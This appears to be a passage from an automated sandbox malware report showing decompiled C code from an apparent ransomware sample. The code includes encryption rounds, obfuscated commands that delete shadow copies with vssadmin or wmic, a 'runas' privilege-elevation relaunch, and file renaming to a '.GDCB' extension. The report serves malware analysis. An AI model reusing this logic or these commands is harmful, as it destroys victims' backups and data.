				signed int* _t714;
				signed int* _t726;
				signed int* _t727;
				signed int* _t739;
				signed int* _t740;
				signed int* _t752;
				signed int* _t753;
				signed int* _t765;
				signed int* _t766;
				signed int* _t778;
				signed int* _t779;
				signed int* _t791;
				signed int* _t792;
				signed int* _t804;
				signed int* _t805;
				signed int* _t817;
				signed int* _t818;
				signed int** _t820;

				asm("lodsd");
				 *__edi =  *__edi + __ecx;
				_t434 = __ebx & 0xffff0000 | __eax + 0x00000001 >> 0x00000010;
				_t485 = __ecx >> 0x10;
				_t493 = __esi ^  *0x0040C1F4;
				_t700 =  *_t820;
				_t358 =  *(0x40ba40 + (_t485 & 0x000000ff) * 4) ^  *(0x40b240 + (_t434 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t434 >> 0x00000010 & 0x000000ff) * 4) ^  *_t700;
				_t437 =  *(0x40b240 + (__ebx & 0x000000ff) * 4) ^  *(0x40b640 + (_t434 & 0x000000ff) * 4) ^  *(0x40be40 + (_t485 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t700[1];
				_t701 =  &(_t700[4]);
				 *_t820 = _t701;
				asm("rol eax, 0x10");
				_t439 = _t437 & 0xffff0000 | _t358 >> 0x00000010;
				_t494 = _t493 >> 0x10;
				_t502 = _t701[2] ^  *(0x40b240 + (_t493 & 0x000000ff) * 4) ^  *(0x40b640 + (_t437 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t358 & 0x000000ff) * 4) ^  *0x0040C1F4;
				_t713 =  *_t820;
				_t366 =  *(0x40ba40 + (_t494 & 0x000000ff) * 4) ^  *(0x40b240 + (_t439 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t439 >> 0x00000010 & 0x000000ff) * 4) ^  *_t713;
				_t442 =  *(0x40b240 + (_t437 & 0x000000ff) * 4) ^  *(0x40b640 + (_t439 & 0x000000ff) * 4) ^  *(0x40be40 + (_t494 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t713[1];
				_t714 =  &(_t713[4]);
				 *_t820 = _t714;
				asm("rol eax, 0x10");
				_t444 = _t442 & 0xffff0000 | _t366 >> 0x00000010;
				_t503 = _t502 >> 0x10;
				_t511 = _t714[2] ^  *(0x40b240 + (_t502 & 0x000000ff) * 4) ^  *(0x40b640 + (_t442 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t366 & 0x000000ff) * 4) ^  *0x0040C1F4;
				_t726 =  *_t820;
				_t374 =  *(0x40ba40 + (_t503 & 0x000000ff) * 4) ^  *(0x40b240 + (_t444 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t444 >> 0x00000010 & 0x000000ff) * 4) ^  *_t726;
				_t447 =  *(0x40b240 + (_t442 & 0x000000ff) * 4) ^  *(0x40b640 + (_t444 & 0x000000ff) * 4) ^  *(0x40be40 + (_t503 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t726[1];
				_t727 =  &(_t726[4]);
				 *_t820 = _t727;
				asm("rol eax, 0x10");
				_t449 = _t447 & 0xffff0000 | _t374 >> 0x00000010;
				_t512 = _t511 >> 0x10;
				_t520 = _t727[2] ^  *(0x40b240 + (_t511 & 0x000000ff) * 4) ^  *(0x40b640 + (_t447 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t374 & 0x000000ff) * 4) ^  *0x0040C1F4;
				_t739 =  *_t820;
				_t382 =  *(0x40ba40 + (_t512 & 0x000000ff) * 4) ^  *(0x40b240 + (_t449 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t449 >> 0x00000010 & 0x000000ff) * 4) ^  *_t739;
				_t452 =  *(0x40b240 + (_t447 & 0x000000ff) * 4) ^  *(0x40b640 + (_t449 & 0x000000ff) * 4) ^  *(0x40be40 + (_t512 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t739[1];
				_t740 =  &(_t739[4]);
				 *_t820 = _t740;
				asm("rol eax, 0x10");
				_t454 = _t452 & 0xffff0000 | _t382 >> 0x00000010;
				_t521 = _t520 >> 0x10;
				_t529 = _t740[2] ^  *(0x40b240 + (_t520 & 0x000000ff) * 4) ^  *(0x40b640 + (_t452 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t382 & 0x000000ff) * 4) ^  *0x0040C1F4;
				_t752 =  *_t820;
				_t390 =  *(0x40ba40 + (_t521 & 0x000000ff) * 4) ^  *(0x40b240 + (_t454 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t454 >> 0x00000010 & 0x000000ff) * 4) ^  *_t752;
				_t457 =  *(0x40b240 + (_t452 & 0x000000ff) * 4) ^  *(0x40b640 + (_t454 & 0x000000ff) * 4) ^  *(0x40be40 + (_t521 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t752[1];
				_t753 =  &(_t752[4]);
				 *_t820 = _t753;
				asm("rol eax, 0x10");
				_t459 = _t457 & 0xffff0000 | _t390 >> 0x00000010;
				_t530 = _t529 >> 0x10;
				_t538 = _t753[2] ^  *(0x40b240 + (_t529 & 0x000000ff) * 4) ^  *(0x40b640 + (_t457 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t390 & 0x000000ff) * 4) ^  *0x0040C1F4;
				_t765 =  *_t820;
				_t398 =  *(0x40ba40 + (_t530 & 0x000000ff) * 4) ^  *(0x40b240 + (_t459 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t459 >> 0x00000010 & 0x000000ff) * 4) ^  *_t765;
				_t462 =  *(0x40b240 + (_t457 & 0x000000ff) * 4) ^  *(0x40b640 + (_t459 & 0x000000ff) * 4) ^  *(0x40be40 + (_t530 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t765[1];
				_t766 =  &(_t765[4]);
				 *_t820 = _t766;
				asm("rol eax, 0x10");
				_t464 = _t462 & 0xffff0000 | _t398 >> 0x00000010;
				_t539 = _t538 >> 0x10;
				_t547 = _t766[2] ^  *(0x40b240 + (_t538 & 0x000000ff) * 4) ^  *(0x40b640 + (_t462 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t398 & 0x000000ff) * 4) ^  *0x0040C1F4;
				_t778 =  *_t820;
				_t406 =  *(0x40ba40 + (_t539 & 0x000000ff) * 4) ^  *(0x40b240 + (_t464 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t464 >> 0x00000010 & 0x000000ff) * 4) ^  *_t778;
				_t467 =  *(0x40b240 + (_t462 & 0x000000ff) * 4) ^  *(0x40b640 + (_t464 & 0x000000ff) * 4) ^  *(0x40be40 + (_t539 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t778[1];
				_t779 =  &(_t778[4]);
				 *_t820 = _t779;
				asm("rol eax, 0x10");
				_t469 = _t467 & 0xffff0000 | _t406 >> 0x00000010;
				_t548 = _t547 >> 0x10;
				_t556 = _t779[2] ^  *(0x40b240 + (_t547 & 0x000000ff) * 4) ^  *(0x40b640 + (_t467 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t406 & 0x000000ff) * 4) ^  *0x0040C1F4;
				_t791 =  *_t820;
				_t414 =  *(0x40ba40 + (_t548 & 0x000000ff) * 4) ^  *(0x40b240 + (_t469 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t469 >> 0x00000010 & 0x000000ff) * 4) ^  *_t791;
				_t472 =  *(0x40b240 + (_t467 & 0x000000ff) * 4) ^  *(0x40b640 + (_t469 & 0x000000ff) * 4) ^  *(0x40be40 + (_t548 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t791[1];
				_t792 =  &(_t791[4]);
				 *_t820 = _t792;
				asm("rol eax, 0x10");
				_t474 = _t472 & 0xffff0000 | _t414 >> 0x00000010;
				_t557 = _t556 >> 0x10;
				_t475 = _t474 >> 0x10;
				_t565 = _t792[2] ^  *(0x40b240 + (_t556 & 0x000000ff) * 4) ^  *(0x40b640 + (_t472 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t414 & 0x000000ff) * 4) ^  *0x0040C1F4;
				_t804 =  *_t820;
				_t422 =  *(0x40ba40 + (_t557 & 0x000000ff) * 4) ^  *(0x40b240 + (_t474 & 0x000000ff) * 4) ^  *0x0040B9F4 ^  *(0x40be40 + (_t475 & 0x000000ff) * 4) ^  *_t804;
				_t477 =  *(0x40b240 + (_t472 & 0x000000ff) * 4) ^  *(0x40b640 + (_t474 & 0x000000ff) * 4) ^  *(0x40be40 + (_t557 & 0x000000ff) * 4) ^  *0x0040BB40 ^ _t804[1];
				_t805 =  &(_t804[4]);
				 *_t820 = _t805;
				asm("rol eax, 0x10");
				_t479 = _t477 & 0xffff0000 | _t422 >> 0x00000010;
				_t566 = _t565 >> 0x10;
				_t480 = _t479 >> 0x10;
				_t594 = (_t792[3] ^  *0x0040B340 ^  *(0x40b640 + (_t556 & 0x000000ff) * 4) ^  *(0x40be40 + (_t414 & 0x000000ff) * 4) ^  *(0x40ba40 + (_t475 & 0x000000ff) * 4)) >> 0x10;
				_t817 =  *_t820;
				_t818 = _t820[7];
				 *_t818 =  *(0x40ca40 + (_t566 & 0x000000ff) * 4) ^  *(0x40c240 + (_t479 & 0x000000ff) * 4) ^  *0x0040C9F4 ^  *(0x40ce40 + (_t480 & 0x000000ff) * 4) ^  *_t817;
				_t818[1] =  *(0x40c240 + (_t477 & 0x000000ff) * 4) ^  *(0x40c640 + (_t479 & 0x000000ff) * 4) ^  *(0x40ce40 + (_t566 & 0x000000ff) * 4) ^  *(0x40ca40 + (_t594 & 0x000000ff) * 4) ^ _t817[1];
				_t818[2] = _t805[2] ^  *(0x40c240 + (_t565 & 0x000000ff) * 4) ^  *(0x40c640 + (_t477 & 0x000000ff) * 4) ^  *(0x40ca40 + (_t422 & 0x000000ff) * 4) ^  *(0x40ce40 + (_t594 & 0x000000ff) * 4);
				_t818[3] = _t805[3] ^  *0x0040C340 ^  *(0x40c640 + (_t565 & 0x000000ff) * 4) ^  *(0x40ce40 + (_t422 & 0x000000ff) * 4) ^  *(0x40ca40 + (_t480 & 0x000000ff) * 4);
				return 0;
			}

0x00402000
0x00402004
0x0040202c
0x0040202e
0x00402093
0x00402097
0x0040209a
0x0040209d
0x004020a0
0x004020a3
0x004020ac
0x004020fe
0x00402100
0x00402165
0x00402169
0x0040216c
0x0040216f
0x00402172
0x00402175
0x0040217e
0x004021d0
0x004021d2
0x00402237
0x0040223b
0x0040223e
0x00402241
0x00402244
0x00402247
0x00402250
0x004022a2
0x004022a4
0x00402309
0x0040230d
0x00402310
0x00402313
0x00402316
0x00402319
0x00402322
0x00402374
0x00402376
0x004023db
0x004023df
0x004023e2
0x004023e5
0x004023e8
0x004023eb
0x004023f4
0x00402446
0x00402448
0x004024ad
0x004024b1
0x004024b4
0x004024b7
0x004024ba
0x004024bd
0x004024c6
0x00402518
0x0040251a
0x0040257f
0x00402583
0x00402586
0x00402589
0x0040258c
0x0040258f
0x00402598
0x004025ea
0x004025ec
0x00402651
0x00402655
0x00402658
0x0040265b
0x0040265e
0x00402661
0x0040266a
0x004026bc
0x004026be
0x004026f3
0x00402723
0x00402727
0x0040272a
0x0040272d
0x00402730
0x00402733
0x0040273c
0x0040278e
0x00402790
0x004027c5
0x004027c8
0x004027f5
0x004027fe
0x00402802
0x00402805
0x00402808
0x0040280b
0x00402823

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfb29fffba2aa599f78320690fab8034409311693ae914370aca9bd705b80840
Instruction ID: f9b15c0d718e0cc2e1350faee993976694927ec24e5c352504746a76a05f8bcd
Opcode Fuzzy Hash: bfb29fffba2aa599f78320690fab8034409311693ae914370aca9bd705b80840
Instruction Fuzzy Hash: 1E220F31D1066C8FDB84EF6EEDA403673A1E744311B47053AAB81BB5A1D734B620ABDC

Uniqueness

Uniqueness Score: -1.00%

Function 00404330 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00404330(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E00403AE0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x00404346
0x004043e2
0x004043ec
0x004043f4
0x004043fc
0x00404400
0x00404408
0x0040440c
0x00404414
0x00404419
0x00404421
0x00404429
0x00404431
0x00404439
0x00404441
0x00404449
0x00404454
0x0040445f
0x0040446a
0x00404475
0x00404480
0x0040448b
0x00404496
0x004044a1
0x004044ac
0x004044b7
0x004044c2
0x004044cd
0x0040434c
0x0040434e
0x00404356
0x0040435e
0x00404362
0x0040436a
0x0040436e
0x00404376
0x0040437e
0x00404386
0x0040438e
0x00404393
0x0040439b
0x004043a3
0x004043ab
0x004043b3
0x004043bb
0x004043c3
0x004043cb
0x004043d3
0x004043d3
0x004044e6
0x004044f5
0x004044f9
0x00404505
0x0040450d
0x00404523
0x0040452b
0x0040452d
0x004044fb
0x004044fb
0x004044fb
0x00404537
0x00404545

APIs

Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 004044EF
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 00404505
lstrcatW.KERNEL32(00000000,0063005C), ref: 0040450D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 00404523
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404537

Strings

c, xrefs: 004043AB
, xrefs: 00404496
open, xrefs: 0040451C
m, xrefs: 00404439
s, xrefs: 00404393
e, xrefs: 004043D3
n, xrefs: 00404441
, xrefs: 0040446A
, xrefs: 004043BB
x, xrefs: 00404386
w, xrefs: 0040436E
l, xrefs: 00404454
o, xrefs: 004043A3
\, xrefs: 004043E2
, xrefs: 00404421
., xrefs: 00404400
a, xrefs: 004044A1
w, xrefs: 0040448B
m, xrefs: 00404362
u, xrefs: 004044C2
e, xrefs: 004043CB
t, xrefs: 0040445F
p, xrefs: 004043B3
m, xrefs: 004043EC
e, xrefs: 004044CD
., xrefs: 0040437E
d, xrefs: 00404449
\, xrefs: 0040434E
i, xrefs: 00404376
h, xrefs: 00404475
b, xrefs: 00404356
/, xrefs: 00404419
a, xrefs: 0040439B
l, xrefs: 004044AC
/, xrefs: 004044B7
a, xrefs: 00404431
s, xrefs: 00404429
d, xrefs: 00404480
x, xrefs: 0040440C
e, xrefs: 004043C3

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
Instruction ID: b655391ad336c4b4d1e3433ef327ff3d08d390bc764b3395417c8c24b6d0b817
Opcode Fuzzy Hash: 457aec27be439b32d5edbcfb73d8ffc908ef2337d77650b0000b9c1325a34fbc
Instruction Fuzzy Hash: 7D41FAB0248380DFE3208F119949B5BBEE6BBC5B49F10491DE6985A291C7F6854CCF9B

Uniqueness

Uniqueness Score: -1.00%

Function 00403BA0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BA0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E00403AE0(__edx);
				if(_t54 != 0) {
					_t54 = E00403A60();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x00403baf
0x00403bb1
0x00403bb8
0x00403bbe
0x00403bc5
0x00403bd7
0x00403be4
0x00403bed
0x00403bf5
0x00403bfd
0x00403c05
0x00403c0d
0x00403c15
0x00403c1d
0x00403c25
0x00403c2d
0x00403c35
0x00403c3d
0x00403c45
0x00403c4d
0x00403c58
0x00403c68
0x00403c71
0x00403c79
0x00403c81
0x00403c89
0x00403c91
0x00403c99
0x00403ca1
0x00403ca9
0x00403cb4
0x00403cbf
0x00403cca
0x00403cd5
0x00403ce0
0x00403ceb
0x00403cf6
0x00403d01
0x00403d0c
0x00403d17
0x00403d31
0x00403d33
0x00403d39
0x00403d40
0x00403d4c
0x00403d4e
0x00403d55
0x00403d5d
0x00403d65
0x00403d6d
0x00403d77
0x00403d81
0x00403d84
0x00403d8b
0x00403d92
0x00403da0
0x00403da1
0x00403da5
0x00000000
0x00000000
0x00403da7
0x00403dab
0x00000000
0x00000000
0x00403db4
0x00000000
0x00403db4
0x00403dc6
0x00403dcf
0x00403dd7
0x00403dd7
0x00403bc5
0x00403dba
0x00403dc0

APIs

Part of subcall function 00403AE0: _memset.LIBCMT ref: 00403B32
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 00403B56
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 00403B5A
Part of subcall function 00403AE0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 00403B5E
Part of subcall function 00403AE0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00403B85

Part of subcall function 00403A60: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00403A90

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00403C4D
wsprintfW.USER32 ref: 00403D17
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 00403D2B
GetForegroundWindow.USER32 ref: 00403D40
ShellExecuteExW.SHELL32(00000000), ref: 00403DA1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403DB4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00403DC6
CloseHandle.KERNEL32(?), ref: 00403DCF
ExitProcess.KERNEL32 ref: 00403DD7

Strings

s, xrefs: 00403C79
i, xrefs: 00403BE4
n, xrefs: 00403D5D
t, xrefs: 00403C0D
s, xrefs: 00403CE0
l, xrefs: 00403C89
\, xrefs: 00403C35
y, xrefs: 00403C05
", xrefs: 00403D0C
a, xrefs: 00403CA1
r, xrefs: 00403BF5
e, xrefs: 00403CA9
m, xrefs: 00403CBF
e, xrefs: 00403C2D
d, xrefs: 00403BED
, xrefs: 00403C91
o, xrefs: 00403C68
c, xrefs: 00403CD5
r, xrefs: 00403C99
%, xrefs: 00403D01
e, xrefs: 00403C71
p, xrefs: 00403C58
w, xrefs: 00403C25
, xrefs: 00403CCA
c, xrefs: 00403C81
2, xrefs: 00403C1D
a, xrefs: 00403CEB
%, xrefs: 00403BD7
\, xrefs: 00403BFD
s, xrefs: 00403D65
r, xrefs: 00403D55
c, xrefs: 00403C45
m, xrefs: 00403C15
t, xrefs: 00403CF6
", xrefs: 00403CB4

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
Instruction ID: cc7589b939d66cedc96280ec9e713ba096b07f437b5f45324ccf50025119f88d
Opcode Fuzzy Hash: b6707db397b164f005e7f481d8c6e4cfd5bd65f7e48af9735fd005866d46f993
Instruction Fuzzy Hash: FF515CB0108341DFE3208F11C94878BBFF9BF84749F00492DE5989A292D7FA9558CF96

Uniqueness

Uniqueness Score: -1.00%

Function 004035E0 Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 300
memoryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004035E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				void* _v28;
				WCHAR* _v32;
				void* _v36;
				long _v40;
				void* _v44;
				void* _v48;
				WCHAR* _v52;
				void* _v56;
				void* _v60;
				signed int _v64;
				void _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				long _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t100;
				void* _t106;
				long _t121;
				long _t122;
				void* _t123;
				long _t125;
				WCHAR* _t139;
				void* _t142;
				void* _t145;
				void* _t147;
				WCHAR* _t158;
				WCHAR* _t160;
				void* _t161;
				void* _t162;
				void _t164;
				long _t165;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t139 = __ecx;
				_t162 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t139, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v40 = 0;
				_t147 = _t162;
				E00405EA0(_t147, 0, 0,  &_v20,  &_v40);
				_t158 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v32 = _t158;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t158, _t139);
				lstrcatW(_t158,  &_v80);
				asm("movdqa xmm0, [0x410950]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t147);
				asm("movdqa xmm0, [0x410950]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0x410950]");
				asm("movdqu [ebp-0x64], xmm0");
				E00407DB0( &_v104, 0x10);
				E00407DB0( &_v140, 0x20);
